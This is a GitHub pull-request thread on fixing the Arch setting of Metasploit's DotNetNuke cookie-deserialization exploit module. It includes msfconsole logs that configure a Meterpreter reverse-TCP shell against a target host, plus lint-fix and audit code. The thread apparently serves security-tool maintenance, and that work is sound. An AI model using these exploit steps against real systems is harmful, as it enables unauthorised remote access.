
Adding Arch parameter to dnn_cookie_deserialization_rce module #19176

Open. Wants to merge 1 commit into base: master.

Conversation

@Fufu-btw commented May 9, 2024

Hi,
It seems that since a recent update, the dnn_cookie_deserialization_rce Metasploit module needs an Arch parameter to enable x64 payloads.

Test Env

┌──(fufu㉿salt)-[~]
└─$ msfconsole --version
Framework Version: 6.4.5-dev

Target: DNN v9.0.1

Verification

Before:

msf6 > use windows/http/dnn_cookie_deserialization_rce
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOST 10.10.110.10
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set target 0
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST tun0
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 8080
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > run

[-] Exploit failed: windows/x64/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.

After the modification:

msf6 > use windows/http/dnn_cookie_deserialization_rce
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOST 10.10.110.10
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set target 0
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST tun0
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 8080
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > run

[*] Trying to determine DNN Version...
[!] DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED
[*] Checking for custom error page at: /__ ...
[+] Custom error page detected.
[*] Sending Exploit Payload to: /__ ...
[*] Exploit completed, but no session was created.


smcintyre-r7 added the "confirmed" (Issues confirmed by a committer) label on May 10, 2024
@smcintyre-r7 (Contributor)

This is due to the changes I introduced in #19111. Prior to that, users were able to set payloads with whatever architecture they wanted and the framework would allow it regardless of what the module defined as compatible. There are probably other deserialization modules that are affected if the module didn't define that they were compatible with ARCH_X64.
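A coarse audit for the situation smcintyre-r7 describes, as an added Ruby example that is not metasploit-framework code: it scans module sources for their 'Arch' metadata and lists the modules that would now refuse an x64 payload. The regex-based parsing and the rule that an undeclared Arch behaves as x86-only are my assumptions (the latter matches the session above, where the x86 default payload was accepted and the x64 one refused); the sample sources are constructed.

```ruby
# Added example, not framework code. Assumptions:
#  * an 'Arch' => ... entry is located with a regex over the module source,
#    which covers the usual `'Arch' => [ARCH_X86, ARCH_X64]` style;
#  * a module with no 'Arch' entry is treated as x86-only.
ARCH_X86 = 'x86'
ARCH_X64 = 'x64'
ARCH_BY_CONST = { 'ARCH_X86' => ARCH_X86, 'ARCH_X64' => ARCH_X64 }.freeze

# Matches either a bracketed list or a single ARCH_* constant.
ARCH_DECL = /'Arch'\s*=>\s*(?:\[([^\]]*)\]|(ARCH_\w+))/

# Architectures a module source declares (module-level or per target).
def declared_arches(source)
  source.scan(ARCH_DECL).flat_map do |list, single|
    (list || single).scan(/ARCH_\w+/).map { |c| ARCH_BY_CONST.fetch(c, c) }
  end.uniq
end

# Would a payload of the given arch pass the stricter compatibility check?
def payload_compatible?(source, payload_arch)
  arches = declared_arches(source)
  arches = [ARCH_X86] if arches.empty? # assumption: undeclared means x86-only
  arches.include?(payload_arch)
end

# Names of modules (hash of name => source) that would refuse an x64 payload.
def modules_missing_x64(sources)
  sources.reject { |_, src| payload_compatible?(src, ARCH_X64) }.keys.sort
end

# Constructed sample sources mimicking the relevant lines of an info hash.
SAMPLE_MODULES = {
  'dnn_cookie_deserialization_rce (before)' => "'Platform' => 'win',\n",
  'dnn_cookie_deserialization_rce (after)'  => "'Arch' => [ARCH_X86, ARCH_X64],\n",
  'some_other_deserialization_rce'          => "'Arch' => ARCH_X86,\n"
}.freeze

if __FILE__ == $PROGRAM_NAME
  puts modules_missing_x64(SAMPLE_MODULES)
end
```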

smcintyre-r7 self-assigned this on May 10, 2024
smcintyre-r7 added the "module", "bug" and "rn-fix" (release notes fix) labels on May 10, 2024
@smcintyre-r7 (Contributor)

The linting is failing because of two other lines in the module.

If you make this change, it should fix it.

     if @encrypted
       # Requires either supplied key and IV, or verification code and plaintext
-      if (!key.blank? && !iv.blank?)
+      if !key.blank? && !iv.blank?
         @passphrase = key + iv
         # Key and IV were supplied, don't try and decrypt.
         @try_decrypt = false
-      elsif (!@verification_codes.empty? && !@kpt.blank?)
+      elsif !@verification_codes.empty? && !@kpt.blank?
         @try_decrypt = true
       else
         fail_with(Failure::BadConfig, 'You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV).')
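Review bot: Removing the parentheses around the `if` and `elsif` conditions is a pure style change with identical behaviour, so it is safe to bundle with the Arch fix. One thing visible in the same hunk is worth a follow-up: when only one of KEY and IV is supplied, `!key.blank? && !iv.blank?` is false and control drops to the `elsif`, so the user either gets the generic "You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV)." message or, if verification codes happen to be set as well, silently lands in the decrypt path. A dedicated `fail_with(Failure::BadConfig, ...)` for the half-supplied KEY/IV case would make the misconfiguration obvious.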

If you have rubocop set up already, you can make the changes automatically with rubocop -a modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb, but if you don't it'd be easier to just do it by hand.

@adfoster-r7 (Contributor)

Somewhat related: we've got a set of checks to which we can add the requirement that arch be provided:

Validation rules: https://github.com/rapid7/metasploit-framework/blob/master/spec/support/lib/module_validation.rb

Validation spec: https://github.com/rapid7/metasploit-framework/blob/master/spec/module_validation_spec.rb

Status: Waiting on Contributor